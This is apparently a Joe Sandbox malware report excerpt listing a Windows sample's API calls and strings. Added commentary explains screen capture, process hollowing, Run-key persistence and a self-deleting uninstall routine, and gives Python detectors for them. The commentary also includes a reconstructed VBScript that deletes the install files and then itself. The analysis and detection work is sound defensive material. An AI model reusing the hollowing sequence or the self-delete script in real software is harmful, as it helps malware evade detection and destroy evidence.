                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 0cdc0b4430c882dd513f9aba2f942575131dd1f5e6007437ccc46010af73f7df
                                                          • Instruction ID: a1764f4878c0090f3dddee11b9fa4dd44c6bcaf443cdbc9a7423fc55b8fdb92d
                                                          • Opcode Fuzzy Hash: 0cdc0b4430c882dd513f9aba2f942575131dd1f5e6007437ccc46010af73f7df
                                                          • Instruction Fuzzy Hash: 285138616407049BDB38856884DB7BF679A9B5E704F18390FE486F73C2C60DEE06875E
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 1c779f12f611b8dda6e5ae50ec22da61f8b8ae12354eff81384336edfcffc5bc
                                                          • Instruction ID: b54697577a8b4caa58ab057165119fb3c01a9d9d25aa48dfc33613f80cd324c0
                                                          • Opcode Fuzzy Hash: 1c779f12f611b8dda6e5ae50ec22da61f8b8ae12354eff81384336edfcffc5bc
                                                          • Instruction Fuzzy Hash: D2616D32A0C3059FC308DF75E581A5BB7E5BFCC718F910D1EF4899A151E634EA088B96
                                                          APIs
                                                          • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004181AF
                                                          • CreateCompatibleDC.GDI32(00000000), ref: 004181BA
                                                            • Part of subcall function 00418648: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 00418678
                                                          • CreateCompatibleBitmap.GDI32(?,00000000), ref: 0041823B
                                                          • DeleteDC.GDI32(?), ref: 00418253
                                                          • DeleteDC.GDI32(00000000), ref: 00418256
                                                          • SelectObject.GDI32(00000000,00000000), ref: 00418261
                                                          • StretchBlt.GDI32(00000000,00000000,00000000,00000000,?,?,?,?,00000000,?,00CC0020), ref: 00418289
                                                          • GetCursorInfo.USER32(?), ref: 004182AB
                                                          • GetIconInfo.USER32(?,?), ref: 004182C1
                                                          • DeleteObject.GDI32(?), ref: 004182F0
                                                          • DeleteObject.GDI32(?), ref: 004182FD
                                                          • DrawIcon.USER32(00000000,?,?,?), ref: 0041830A
                                                          • BitBlt.GDI32(00000000,00000000,00000000,00000000,?,?,00000000,00000000,00660046), ref: 0041833A
                                                          • GetObjectA.GDI32(?,00000018,?), ref: 00418369
                                                          • LocalAlloc.KERNEL32(00000040,00000028), ref: 004183B2
                                                          • LocalAlloc.KERNEL32(00000040,00000001), ref: 004183D5
                                                          • GlobalAlloc.KERNEL32(00000000,?), ref: 0041843E
                                                          • GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00418461
                                                          • DeleteDC.GDI32(?), ref: 00418475
                                                          • DeleteDC.GDI32(00000000), ref: 00418478
                                                          • DeleteObject.GDI32(00000000), ref: 0041847B
                                                          • GlobalFree.KERNEL32(00CC0020), ref: 00418486
                                                          • DeleteObject.GDI32(00000000), ref: 0041853A
                                                          • GlobalFree.KERNEL32(?), ref: 00418541
                                                          • DeleteDC.GDI32(?), ref: 00418551
                                                          • DeleteDC.GDI32(00000000), ref: 0041855C
                                                          • DeleteDC.GDI32(?), ref: 0041858E
                                                          • DeleteDC.GDI32(00000000), ref: 00418591
                                                          • DeleteObject.GDI32(?), ref: 00418597
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Delete$Object$AllocCreateGlobal$CompatibleFreeIconInfoLocal$BitmapBitsCursorDisplayDrawEnumSelectSettingsStretch
                                                          • String ID: DISPLAY
                                                          • API String ID: 1352755160-865373369
                                                          • Opcode ID: f43b31cd191835719c67feef2a51a2d06668b937d994ffc7dcc294679b32e0a8
                                                          • Instruction ID: a1654617e6feb41a21483335bab58d6c80918fdf06c9fa75f2eb3c48c5790805
                                                          • Opcode Fuzzy Hash: f43b31cd191835719c67feef2a51a2d06668b937d994ffc7dcc294679b32e0a8
                                                          • Instruction Fuzzy Hash: EFC16C31504344AFD7209F21CC44BABBBE9EF88751F44482EF989A32A1DF34E945CB5A
                                                          APIs
                                                          • GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 00417472
                                                          • GetProcAddress.KERNEL32(00000000), ref: 00417475
                                                          • GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 00417486
                                                          • GetProcAddress.KERNEL32(00000000), ref: 00417489
                                                          • GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 0041749A
                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041749D
                                                          • GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 004174AE
                                                          • GetProcAddress.KERNEL32(00000000), ref: 004174B1
                                                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00417552
                                                          • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 0041756A
                                                          • GetThreadContext.KERNEL32(?,00000000), ref: 00417580
                                                          • ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 004175A6
                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00417626
                                                          • TerminateProcess.KERNEL32(?,00000000), ref: 0041763A
                                                          • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 00417671
                                                          • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 0041773E
                                                          • SetThreadContext.KERNEL32(?,00000000), ref: 0041775B
                                                          • ResumeThread.KERNEL32(?), ref: 00417768
                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00417780
                                                          • GetCurrentProcess.KERNEL32(?), ref: 0041778B
                                                          • TerminateProcess.KERNEL32(?,00000000), ref: 004177A5
                                                          • GetLastError.KERNEL32 ref: 004177AD
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Process$AddressHandleModuleProc$ThreadVirtual$ContextCurrentFreeMemoryTerminate$AllocCreateErrorLastReadResumeWrite
                                                          • String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$ntdll
                                                          • API String ID: 4188446516-3035715614
                                                          • Opcode ID: ca58d074774f4cb3cec8caed2bdcc8ae3fb1cd477b48ba63cf2103ffe40dc484
                                                          • Instruction ID: 9d7e092ec3b05a7a521957261ed1896ff906ab06cfb84d00d3f911d9ff722cfe
                                                          • Opcode Fuzzy Hash: ca58d074774f4cb3cec8caed2bdcc8ae3fb1cd477b48ba63cf2103ffe40dc484
                                                          • Instruction Fuzzy Hash: C3A16D71508304AFD710DF65CD89B6B7BF8FB48345F00082EF699962A1DB75E884CB6A
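The API list directly above is the textbook process-hollowing sequence: ZwCreateSection, ZwMapViewOfSection, ZwUnmapViewOfSection and ZwClose are resolved from ntdll by name, a child is started with CreateProcessW and dwCreationFlags 00000004 (CREATE_SUSPENDED), GetThreadContext and a 4-byte ReadProcessMemory locate the child's image base (typically via the PEB), the replacement image is written with WriteProcessMemory, the entry point is redirected with SetThreadContext, and ResumeThread runs it. The report prints these constants as raw hex, so the Python script below, an added example written for this page and not Joe Sandbox or sample code, parses lines in the report's `Name.MODULE(args), ref: ADDR` format, names the well-known Win32 constants (including the GDI screenshot routine further up, where StretchBlt's 00CC0020 is SRCCOPY and BitBlt's 00660046 is SRCINVERT), and flags the suspended-create, rewrite, resume pattern. The trace lines are copied from the two API lists above; the constant tables are standard Win32 values and the detection heuristic is my own.

```python
"""Decode the per-function API listings above and flag process hollowing.
Added example for this report page: not Joe Sandbox code and not code from the
sample. Trace lines are copied from the report; tables are standard Win32 values."""
import re
from dataclasses import dataclass

# "• Name.MODULE(arg,arg,...), ref: 0041756A", optionally prefixed with "Part of subcall
# function XXXXXXXX:". Greedy ".*" keeps nested parentheses inside the argument list.
_LINE = re.compile(
    r"^\s*•?\s*(?:Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(\w+)\.(\w+)(?:\((.*)\),?)?\s*ref:\s*([0-9A-Fa-f]{8})\s*$")

@dataclass
class ApiCall:
    name: str
    module: str
    args: list
    ref: int        # address of the call site inside the dumped image
    subcall: bool   # attributed to a callee rather than this function

def parse_api_line(line: str) -> ApiCall:
    m = _LINE.match(line)
    if not m:
        raise ValueError(f"not a Joe Sandbox API line: {line!r}")
    name, module, raw_args, ref = m.groups()
    args = [a.strip() for a in raw_args.split(",")] if raw_args else []
    return ApiCall(name, module, args, int(ref, 16), "Part of subcall" in line)

_CREATION = {0x4: "CREATE_SUSPENDED", 0x10: "CREATE_NEW_CONSOLE", 0x8000000: "CREATE_NO_WINDOW"}
_ROP = {0x00CC0020: "SRCCOPY", 0x00660046: "SRCINVERT"}
# (API, 0-based argument index) -> (parameter name, exact-value table?, names)
FLAG_TABLES = {
    ("CreateProcessW", 5): ("dwCreationFlags", False, _CREATION),
    ("CreateProcessA", 5): ("dwCreationFlags", False, _CREATION),
    ("VirtualAlloc", 2): ("flAllocationType", False, {0x1000: "MEM_COMMIT", 0x2000: "MEM_RESERVE"}),
    ("VirtualAlloc", 3): ("flProtect", False, {0x04: "PAGE_READWRITE", 0x20: "PAGE_EXECUTE_READ",
                                                0x40: "PAGE_EXECUTE_READWRITE"}),
    ("VirtualFree", 2): ("dwFreeType", False, {0x4000: "MEM_DECOMMIT", 0x8000: "MEM_RELEASE"}),
    ("StretchBlt", 10): ("rop", True, _ROP),
    ("BitBlt", 8): ("rop", True, _ROP),
    ("RegDeleteKeyA", 0): ("hKey", True, {0x80000001: "HKEY_CURRENT_USER", 0x80000002: "HKEY_LOCAL_MACHINE"}),
    ("SetFileAttributesW", 1): ("dwFileAttributes", False, {0x02: "FILE_ATTRIBUTE_HIDDEN", 0x80: "FILE_ATTRIBUTE_NORMAL"}),
}

def decode_flags(call: ApiCall) -> dict:
    """Name the constants the report prints only as hex ("?" stays unknown)."""
    out = {}
    for idx, arg in enumerate(call.args):
        spec = FLAG_TABLES.get((call.name, idx))
        if spec is None or not re.fullmatch(r"[0-9A-Fa-f]+", arg):
            continue
        param, exact, table = spec
        value = int(arg, 16)
        names = ([table[value]] if value in table else []) if exact \
            else [n for bit, n in table.items() if value & bit]
        out[param] = names or [f"0x{value:X}"]
    return out

HOLLOW_SEQUENCE = ("GetThreadContext", "WriteProcessMemory", "SetThreadContext", "ResumeThread")

def detect_process_hollowing(calls):
    """Suspended child, then context read, memory write, context set, resume, in
    call-site order. Returns an evidence dict, or None when the pattern is absent."""
    ordered = sorted(calls, key=lambda c: c.ref)
    start = next((c for c in ordered if c.name.startswith("CreateProcess")
                  and "CREATE_SUSPENDED" in decode_flags(c).get("dwCreationFlags", [])), None)
    if start is None:
        return None
    wanted, matched = list(HOLLOW_SEQUENCE), []
    for c in ordered:
        if wanted and c.ref > start.ref and c.name == wanted[0]:
            matched.append((c.name, c.ref))
            wanted.pop(0)
    if wanted:
        return None
    # ntdll section routines resolved by name mark the unmap-and-remap variant
    section_apis = {a for c in calls for a in c.args if a.startswith(("Zw", "Nt")) and "Section" in a}
    return {"suspended_create": start.ref, "sequence": matched, "section_apis": sorted(section_apis)}

# Lines copied from the screenshot and hollowing API lists in this report
SCREENSHOT_TRACE = [
    "• StretchBlt.GDI32(00000000,00000000,00000000,00000000,?,?,?,?,00000000,?,00CC0020), ref: 00418289",
    "• BitBlt.GDI32(00000000,00000000,00000000,00000000,?,?,00000000,00000000,00660046), ref: 0041833A",
]
HOLLOWING_TRACE = [
    "• GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 00417472",
    "• GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 00417486",
    "• GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 0041749A",
    "• CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00417552",
    "• VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 0041756A",
    "• GetThreadContext.KERNEL32(?,00000000), ref: 00417580",
    "• WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 0041773E",
    "• SetThreadContext.KERNEL32(?,00000000), ref: 0041775B",
    "• ResumeThread.KERNEL32(?), ref: 00417768",
]

if __name__ == "__main__":
    for label, trace in (("screenshot", SCREENSHOT_TRACE), ("hollowing", HOLLOWING_TRACE)):
        calls = [parse_api_line(line) for line in trace]
        for c in calls:
            if decode_flags(c):
                print(f"{label}: {c.name} @ {c.ref:08X} -> {decode_flags(c)}")
        print(f"{label}: hollowing evidence = {detect_process_hollowing(calls)}")
```

The heuristic deliberately keys on the CREATE_SUSPENDED flag plus the ordered GetThreadContext, WriteProcessMemory, SetThreadContext, ResumeThread chain rather than on any single API, because each of those calls is common in debuggers and installers on its own; the resolved Zw*Section names are reported as supporting evidence only, since the argument column of GetModuleHandleA shows stack residue and not just the real parameter.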
                                                          APIs
                                                            • Part of subcall function 00411771: TerminateProcess.KERNEL32(00000000,pth_unenc,0040E748), ref: 00411781
                                                            • Part of subcall function 00411771: WaitForSingleObject.KERNEL32(000000FF), ref: 00411794
                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,00000000), ref: 0040C38B
                                                          • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040C39E
                                                          • SetFileAttributesW.KERNEL32(?,00000080,?,?,00000000), ref: 0040C3B7
                                                          • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,00000000), ref: 0040C3E7
                                                            • Part of subcall function 0040AFBA: TerminateThread.KERNEL32(004099A9,00000000,00475308,pth_unenc,0040BF26,004752F0,00475308,?,pth_unenc), ref: 0040AFC9
                                                            • Part of subcall function 0040AFBA: UnhookWindowsHookEx.USER32(00475108), ref: 0040AFD5
                                                            • Part of subcall function 0040AFBA: TerminateThread.KERNEL32(Function_00009993,00000000,?,pth_unenc), ref: 0040AFE3
                                                            • Part of subcall function 0041B79A: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00466900,00000000,00000000,0040C267,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 0041B7D9
                                                          • ShellExecuteW.SHELL32(00000000,open,00000000,00466900,00466900,00000000), ref: 0040C632
                                                          • ExitProcess.KERNEL32 ref: 0040C63E
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                                          • String ID: SG$ SG$ SG$""", 0$")$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$PSG$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$dMG$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
                                                          • API String ID: 1861856835-1415323999
                                                          • Opcode ID: 8e9550d2a36138100e1c2fc1d5f82ae9fdcfc18a7661daa6d71ec6f3d761d588
                                                          • Instruction ID: 61d23169d088639e971774d7266815e56d2523c1fe05d3951d40341dc357c42d
                                                          • Opcode Fuzzy Hash: 8e9550d2a36138100e1c2fc1d5f82ae9fdcfc18a7661daa6d71ec6f3d761d588
                                                          • Instruction Fuzzy Hash: F891A3316042005AC314FB21D852AAF7799AF90318F50453FF88AB71E2EF7CAD49C69E
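The record above (and the near-duplicate that follows it) is the sample's uninstall routine: GetModuleFileNameW fetches its own path, RegDeleteKeyA runs against HKEY_CURRENT_USER (80000001) with the `Software\Microsoft\Windows\CurrentVersion\Run\` and `...\Policies\Explorer\Run\` paths among the function's strings, SetFileAttributesW resets its files to FILE_ATTRIBUTE_NORMAL (00000080), and a `.vbs` is written under `Temp`, started with ShellExecuteW("open") and left behind while ExitProcess runs. The strings give the script body: `On Error Resume Next`, `Set fso = CreateObject("Scripting.FileSystemObject")`, a `while fso.FileExists(" ... wend` loop that keeps calling `fso.DeleteFile` until the exiting process releases the executable, `fso.DeleteFolder`, and finally `fso.DeleteFile(Wscript.ScriptFullName)` so the script erases itself. The Python triage helper below is an added example for this page, not code from the sample or from Joe Sandbox: it scores a recovered script against those fragments and lists what it tried to delete. Both scripts it runs on are constructed; the install path and the statement order of the suspicious one are assumptions, because the report lists the fragments but not the assembled file.

```python
"""Triage a recovered .vbs for the self-delete/uninstall pattern whose fragments
appear in the report's string list. Added example for this page; not sample code."""
import re

# Literal fragments from the report's String ID list, as regexes over script text
INDICATORS = {
    "suppress_errors": re.compile(r"^\s*On Error Resume Next\s*$", re.I | re.M),
    "fso_created":     re.compile(r'CreateObject\("Scripting\.FileSystemObject"\)', re.I),
    "self_delete":     re.compile(r"fso\.DeleteFile\s*\(\s*WScript\.ScriptFullName\s*\)", re.I),
    "folder_delete":   re.compile(r'fso\.DeleteFolder\s+"', re.I),
    "shell_run_cmd":   re.compile(r'CreateObject\("WScript\.Shell"\)\.Run\s+"cmd /c', re.I),
}
# while fso.FileExists("<path>") ... wend: spin until the running exe can be removed
POLL_LOOP = re.compile(r'while\s+fso\.FileExists\(\s*"([^"]+)"\s*\)(.*?)^\s*wend\b',
                       re.I | re.S | re.M)
# fso.DeleteFile "<path>" / fso.DeleteFolder "<path>" (quoted literal targets only)
TARGET = re.compile(r'fso\.Delete(File|Folder)\s*\(?\s*"([^"]+)"', re.I)

def find_indicators(script: str) -> dict:
    """Which of the report's fragments are present; the loop counts only if it deletes."""
    hits = {name: bool(rx.search(script)) for name, rx in INDICATORS.items()}
    loop = POLL_LOOP.search(script)
    hits["poll_until_deleted"] = bool(loop and "DeleteFile" in loop.group(2))
    return hits

def deleted_targets(script: str) -> list:
    """(kind, path) pairs the script tries to remove, deduplicated, in order."""
    seen = []
    for kind, path in TARGET.findall(script):
        if (kind.lower(), path) not in seen:
            seen.append((kind.lower(), path))
    return seen

def classify(script: str) -> str:
    hits = find_indicators(script)
    # The combination that matters is the poll-until-gone loop plus the script
    # erasing itself; FileSystemObject use on its own is ordinary admin VBScript.
    if hits["poll_until_deleted"] and hits["self_delete"]:
        return "self-delete uninstall script"
    if sum(hits.values()) >= 3:
        return "suspicious"
    return "no match"

# Constructed from the report's fragments; the path is a placeholder and the
# statement order is assumed, since the report does not show the assembled file.
SUSPECT_VBS = r'''On Error Resume Next
Set fso = CreateObject("Scripting.FileSystemObject")
while fso.FileExists("C:\Users\victim\AppData\Roaming\Example\payload.exe")
fso.DeleteFile "C:\Users\victim\AppData\Roaming\Example\payload.exe"
wend
fso.DeleteFolder "C:\Users\victim\AppData\Roaming\Example"
fso.DeleteFile(Wscript.ScriptFullName)
'''

# Constructed benign admin script: same object, no polling loop, no self-delete
BENIGN_VBS = r'''Set fso = CreateObject("Scripting.FileSystemObject")
If fso.FileExists("C:\logs\old.log") Then fso.DeleteFile "C:\logs\old.log"
'''

if __name__ == "__main__":
    for label, script in (("suspect", SUSPECT_VBS), ("benign", BENIGN_VBS)):
        print(label, classify(script), find_indicators(script), deleted_targets(script))
```

When a host shows the RegDeleteKeyA/ShellExecuteW/ExitProcess sequence above, the script in `%TEMP%` is usually already gone, since it deletes itself last; the indicators are therefore most useful against script contents recovered from AMSI or Script Block style telemetry, from a VSS copy, or from a sandbox run, and the `deleted_targets` output gives the install directory to check for remnants.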
                                                          APIs
                                                            • Part of subcall function 00411771: TerminateProcess.KERNEL32(00000000,pth_unenc,0040E748), ref: 00411781
                                                            • Part of subcall function 00411771: WaitForSingleObject.KERNEL32(000000FF), ref: 00411794
                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,00475308,?,pth_unenc), ref: 0040C013
                                                          • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040C026
                                                          • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,00475308,?,pth_unenc), ref: 0040C056
                                                          • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,00475308,?,pth_unenc), ref: 0040C065
                                                            • Part of subcall function 0040AFBA: TerminateThread.KERNEL32(004099A9,00000000,00475308,pth_unenc,0040BF26,004752F0,00475308,?,pth_unenc), ref: 0040AFC9
                                                            • Part of subcall function 0040AFBA: UnhookWindowsHookEx.USER32(00475108), ref: 0040AFD5
                                                            • Part of subcall function 0040AFBA: TerminateThread.KERNEL32(Function_00009993,00000000,?,pth_unenc), ref: 0040AFE3
                                                            • Part of subcall function 0041AD43: GetCurrentProcessId.KERNEL32(00000000,771B3530,00000000,?,?,?,?,00466900,0040C07B,.vbs,?,?,?,?,?,00475308), ref: 0041AD6A
                                                          • ShellExecuteW.SHELL32(00000000,open,00000000,00466900,00466900,00000000), ref: 0040C280
                                                          • ExitProcess.KERNEL32 ref: 0040C287
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                                          • String ID: SG$ SG$")$.vbs$On Error Resume Next$PSG$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$dMG$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$pth_unenc$wend$while fso.FileExists("
                                                          • API String ID: 3797177996-899740633
                                                          • Opcode ID: 45352128316decb50fa812bea07fa27229c4ed24509ec15bd5d086fbabda10ef
                                                          • Instruction ID: 3970d62be7f9f5e1fdb580af11360c5c0218cddba346a3e39168d22276c4a34b
                                                          • Opcode Fuzzy Hash: 45352128316decb50fa812bea07fa27229c4ed24509ec15bd5d086fbabda10ef
                                                          • Instruction Fuzzy Hash: 838194316042005BC315FB21D852AAF7799AF91708F10453FF986A72E2EF7C9D49C69E
                                                          APIs
                                                          • CreateMutexA.KERNEL32(00000000,00000001,00000000,00475308,?,00000000), ref: 004113AC
                                                          • ExitProcess.KERNEL32 ref: 004115F5
                                                            • Part of subcall function 00412735: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000,00475308), ref: 00412751
                                                            • Part of subcall function 00412735: RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000208,?), ref: 0041276A
                                                            • Part of subcall function 00412735: RegCloseKey.KERNEL32(00000000), ref: 00412775
                                                            • Part of subcall function 0041B825: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B83E
                                                          • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,?,?,?,00000000), ref: 00411433
                                                          • OpenProcess.KERNEL32(00100000,00000000,,@,?,?,?,?,00000000), ref: 00411442
                                                          • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,00000000), ref: 0041144D
                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000), ref: 00411454
                                                          • GetCurrentProcessId.KERNEL32(?,?,?,?,00000000), ref: 0041145A
                                                            • Part of subcall function 004128AD: RegCreateKeyA.ADVAPI32(80000001,00000000,TeF), ref: 004128BB
                                                            • Part of subcall function 004128AD: RegSetValueExA.KERNEL32(TeF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004670E0,00000001,000000AF,00466554), ref: 004128D6
                                                            • Part of subcall function 004128AD: RegCloseKey.ADVAPI32(?,?,?,?,0040B94C,004670E0,00000001,000000AF,00466554), ref: 004128E1
                                                          • PathFileExistsW.SHLWAPI(?,?,?,?,?,00000000), ref: 0041148B
                                                          • GetTempPathW.KERNEL32(00000104,?,?,?,?,?,?,?,?,00000000), ref: 004114E7
                                                          • GetTempFileNameW.KERNEL32(?,temp_,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00411501
                                                          • lstrcatW.KERNEL32(?,.exe,?,?,?,?,?,?,?,00000000), ref: 00411513
                                                            • Part of subcall function 0041B79A: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0041B7F6
                                                            • Part of subcall function 0041B79A: WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0041B80A
                                                            • Part of subcall function 0041B79A: CloseHandle.KERNEL32(00000000), ref: 0041B817
                                                          • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 0041155B
                                                          • Sleep.KERNEL32(000001F4,?,?,?,?,00000000), ref: 0041159C
                                                          • OpenProcess.KERNEL32(00100000,00000000,?,?,?,?,?,00000000), ref: 004115B1
                                                          • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,00000000), ref: 004115BC
                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000), ref: 004115C3
                                                          • GetCurrentProcessId.KERNEL32(?,?,?,?,00000000), ref: 004115C9
                                                            • Part of subcall function 0041B79A: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00466900,00000000,00000000,0040C267,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 0041B7D9
                                                          Strings
                                                          Yara matches
                                                          Similarity
                                                          • API ID: File$CloseCreateProcess$HandleOpen$CurrentObjectPathSingleTempValueWait$ExecuteExistsExitMutexNamePointerQueryShellSleepWritelstrcat
                                                          • String ID: ,@$.exe$0TG$PSG$WDH$exepath$open$temp_
                                                          • API String ID: 4250697656-4136069298
